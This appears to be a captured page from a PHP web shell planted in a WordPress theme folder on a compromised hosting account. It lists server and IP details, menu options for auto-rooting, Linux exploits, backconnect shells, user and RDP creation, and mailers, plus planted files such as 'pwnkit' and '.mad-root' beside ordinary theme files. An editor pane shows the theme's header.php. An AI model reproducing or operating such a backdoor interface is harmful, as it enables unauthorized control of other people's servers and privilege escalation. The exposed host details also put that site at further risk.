Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
sento /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
licenses
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
182
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.14
KB
-rw-r--r--
comments.php
3.41
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
194
B
-rw-r--r--
content-search.php
706
B
-rw-r--r--
content-single.php
376
B
-rw-r--r--
content.php
801
B
-rw-r--r--
footer.php
980
B
-rw-r--r--
functions.php
11.18
KB
-rw-r--r--
functionsbak.php
10.69
KB
-rw-r--r--
header.php
3.1
KB
-rw-r--r--
image.php
2.99
KB
-rw-r--r--
index.php
111
B
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.05
KB
-rw-r--r--
page.php
410
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
13.77
KB
-rw-r--r--
screenshot.png
246.88
KB
-rw-r--r--
search.php
462
B
-rw-r--r--
searchform.php
473
B
-rw-r--r--
sidebar.php
873
B
-rw-r--r--
single.php
597
B
-rw-r--r--
style.css
141.11
KB
-rw-r--r--
template-sitemap.php
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header for our theme. * * Displays all of the <head> section and everything up until id="main-core". * * @package Sento */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <?php thinkup_hook_header(); ?> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width" /> <link rel="profile" href="//gmpg.org/xfn/11" /> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" /> <!--[if lt IE 9]> <script src="<?php echo get_template_directory_uri(); ?>/lib/scripts/html5.js" type="text/javascript"></script> <![endif]--> <?php wp_head(); ?> </head> <body <?php body_class(); ?><?php thinkup_bodystyle(); ?>> <?php /* Body hook */ thinkup_hook_bodyhtml(); ?> <div id="body-core" class="hfeed site"> <header> <div id="site-header"> <?php if ( get_header_image() ) : ?> <div class="custom-header"><img src="<?php header_image(); ?>" width="<?php echo get_custom_header()->width; ?>" height="<?php echo get_custom_header()->height; ?>" alt=""></div> <?php endif; // End header image check. ?> <div id="pre-header"> <div class="wrap-safari"> <div id="pre-header-core" class="main-navigation"> <?php if ( has_nav_menu( 'pre_header_menu' ) ) : ?> <?php wp_nav_menu( array( 'container_class' => 'header-links', 'container_id' => 'pre-header-links-inner', 'theme_location' => 'pre_header_menu' ) ); ?> <?php endif; ?> <?php /* Pre Header Search */ thinkup_input_preheadersearch(); ?> <?php /* Social Media Icons */ thinkup_input_socialmediaheaderpre(); ?> </div> </div> </div> <!-- #pre-header --> <div id="header"> <div id="header-core"> <?php if ( thinkup_input_socialmediaheadermain() !== false ) echo '<div id="header-container">'; ?> <div id="logo"> <a rel="home" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php /* Custom Logo */ thinkup_custom_logo(); ?></a> </div> <?php echo thinkup_input_socialmediaheadermain(); ?> <?php if ( thinkup_input_socialmediaheadermain() !== false ) echo '</div>'; ?> <div id="header-links" class="main-navigation"> <div id="header-links-inner" class="header-links"> <?php $walker = new thinkup_menudescription; wp_nav_menu(array( 'container' => false, 'theme_location' => 'header_menu', 'walker' => new thinkup_menudescription() ) ); ?> <?php /* Header Search */ thinkup_input_headersearch(); ?> </div> </div> <!-- #header-links .main-navigation --> <?php /* Add responsive header menu */ thinkup_input_responsivehtml1(); ?> </div> </div> <!-- #header --> <?php /* Add responsive header menu */ thinkup_input_responsivehtml2(); ?> <?php /* Custom Slider */ thinkup_input_sliderhome(); ?> <?php /* Custom Intro - Below */ thinkup_custom_intro(); ?> </div> </header> <!-- header --> <?php /* Call To Action - Intro */ thinkup_input_ctaintro(); ?> <?php /* Pre-Designed HomePage Content */ thinkup_input_homepagesection(); ?> <div id="content"> <div id="content-core"> <div id="main"> <div id="main-core">
Close